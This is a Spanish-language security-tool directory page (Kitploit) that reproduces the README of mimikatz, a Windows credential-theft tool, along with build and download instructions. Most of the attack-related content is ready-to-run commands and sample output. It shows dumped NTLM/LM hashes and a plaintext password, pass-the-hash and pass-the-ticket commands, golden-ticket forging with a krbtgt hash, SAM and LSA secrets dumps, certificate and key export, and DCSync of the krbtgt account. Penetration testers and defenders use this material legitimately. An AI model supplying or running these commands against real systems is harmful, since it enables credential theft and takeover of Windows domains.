Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
mimikatz — Herramienta para extraer credenciales de Windows (contraseñas, hashes, tickets de Kerberos) de la memoria y realizar ataques pass-the-hash, pass-the-ticket y golden ticket. | Kitploit
Herramientas/GitHubGitHub/parrotsec/mimikatz
Escalada de PrivilegiosForensia de MemoriaAtaques de ContraseñasExplotaciónMovimiento LateralPruebas de PenetraciónAutenticaciónRed Teaming
GitHubparrotsec/mimikatz

mimikatz

Herramienta para extraer credenciales de Windows (contraseñas, hashes, tickets de Kerberos) de la memoria y realizar ataques pass-the-hash, pass-the-ticket y golden ticket.

Ver Repositorio
2.6k356hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

mimikatz

mimikatz es una herramienta que he creado para aprender C y hacer algunos experimentos con la seguridad de Windows.

Ahora es bien conocido por extraer contraseñas en texto plano, hashes, códigos PIN y tickets de Kerberos de la memoria. mimikatz también puede realizar pass-the-hash, pass-the-ticket o construir Golden tickets.

root@kitploit:~
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

¡Pero eso no es todo! Crypto, Terminal Server, Events, ... mucha información en la GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki o en http://blog.gentilkiwi.com (en francés, sí).

Si no quieres compilarlo, los binarios están disponibles en https://github.com/gentilkiwi/mimikatz/releases

Uso rápido

root@kitploit:~
log
privilege::debug

sekurlsa

root@kitploit:~
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

root@kitploit:~
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

root@kitploit:~
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault y lsadump

root@kitploit:~
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Compilación

mimikatz tiene la forma de una solución de Visual Studio y un controlador WinDDK (opcional para las operaciones principales), por lo que los requisitos previos son:

  • para mimikatz y mimilib : Visual Studio 2010, 2012 o 2013 para escritorio (2013 Express para escritorio es gratuito y es compatible con x86 y x64 - http://www.microsoft.com/download/details.aspx?id=44914)
  • para el controlador mimikatz, mimilove (y la plataforma ddk2003) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

¡mimikatz usa SVN para el control de versiones, pero ahora también está disponible con GIT! Puedes usar cualquier herramienta que quieras para sincronizar, ¡incluso el GIT integrado en Visual Studio 2013 =)

¡Sincroniza!

  • La URL de GIT es : https://github.com/gentilkiwi/mimikatz.git
  • La URL de SVN es : https://github.com/gentilkiwi/mimikatz/trunk
  • El archivo ZIP es : https://github.com/gentilkiwi/mimikatz/archive/master.zip

Compilar la solución

  • Después de abrir la solución, Build / Build Solution (puedes cambiar la arquitectura)
  • mimikatz ya está compilado y listo para usarse. (Win32 / x64 e incluso ARM64 si tienes suerte)
    • puedes tener el error MSB3073 relacionado con _build_.cmd y mimidrv, es porque el controlador no se puede compilar sin Windows Driver Kit 7.1 (WinDDK), pero mimikatz y mimilib están bien.

ddk2003

Con esta plataforma MSBuild opcional, puedes usar las herramientas de compilación de WinDDK y el runtime msvcrt predeterminado (binarios más pequeños, sin dependencias)

Para esta plataforma opcional, son obligatorios Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 y Visual Studio 2010, incluso si planeas usar Visual Studio 2012 o 2013 después.

Sigue las instrucciones:

  • http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Licencia

Licencia CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

mimikatz necesita café para desarrollarse:

  • PayPal: https://www.paypal.me/delpy/

Autor

  • Benjamin DELPY gentilkiwi, puedes contactarme en Twitter ( @gentilkiwi ) o por correo ( benjamin [at] gentilkiwi.com )
  • Las funciones DCSync y DCShadow en el módulo lsadump fueron coescritas con Vincent LE TOUX, puedes contactarlo por correo ( vincent.letoux [at] gmail.com ) o visitar su sitio web ( http://www.mysmartlogon.com )

Este es un desarrollo personal, por favor respeta su filosofía y ¡no lo uses para cosas malas!

Descargar herramienta